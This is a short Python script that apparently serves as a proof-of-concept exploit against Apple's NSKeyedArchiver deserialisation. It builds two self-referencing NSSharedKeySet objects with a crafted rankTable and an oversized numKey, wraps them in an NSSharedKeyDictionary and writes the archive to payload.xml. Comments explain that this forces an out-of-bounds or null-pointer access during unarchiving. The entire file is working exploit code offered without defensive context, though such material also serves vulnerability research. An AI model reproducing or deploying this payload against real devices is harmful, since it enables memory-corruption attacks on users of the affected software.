#!/usr/bin/env python3
from base64 import b64encode, b64decode
from struct import pack, unpack
from nsarchiver import *

sks2 = ref({
        '$class': shared_key_set_class,
        'NS.M': 16,
        'NS.algorithmType': 1,
        'NS.factor': 3,
        'NS.g': b'\x00\x00\x00',
        # At least one of these keys won't be found (since factor is 3), and will thus
        # cause recursion to the subKeySet which is actually the not-fully-initialized parent.
        # It will do the proper lookup of the key, get index 0x41414141410/8, compare that against
        # the numKey property which at this point is just set to the value we supply below
        # and then access keys[index], where keys is still nullptr.
        'NS.keys': nsarray([ref(0), ref(1), ref(2), ref(3)]),
        'NS.numKey': 4,
        'NS.rankTable': b'\x00' * 16,
        'NS.seed0': 206662775,
        'NS.seed1': 4261499435,
        'NS.select': 0,
        'NS.subskset': None,
})

rankTable = pack('<I', 0x414141410 // 8) * 4
sks1 = ref({
        '$class': shared_key_set_class,
        'NS.M': 16,
        'NS.algorithmType': 1,
        'NS.factor': 3,
        'NS.g': b'\x00\x00\x00',
        'NS.keys': nsarray([]),
        'NS.numKey': 0xffffffff,
        'NS.rankTable': rankTable,
        'NS.seed0': 0x1337,
        'NS.seed1': 0x1337,
        'NS.select': 2,
        'NS.subskset': sks2,
})

sks2.v['NS.subskset'] = sks1

skd1 = ref({
        '$class': shared_key_dict_class,
        'NS.count': 1,
        'NS.keys': nsmutarray([ref(1337)]),
        'NS.sideDic': null,
        'NS.skkeyset': sks1,
        'NS.values': nsarray([ref(42)]),
})

archiver = NSArchiver()
data = archiver.archive(skd1)

with open('payload.xml', 'w') as f:
    f.write(data)


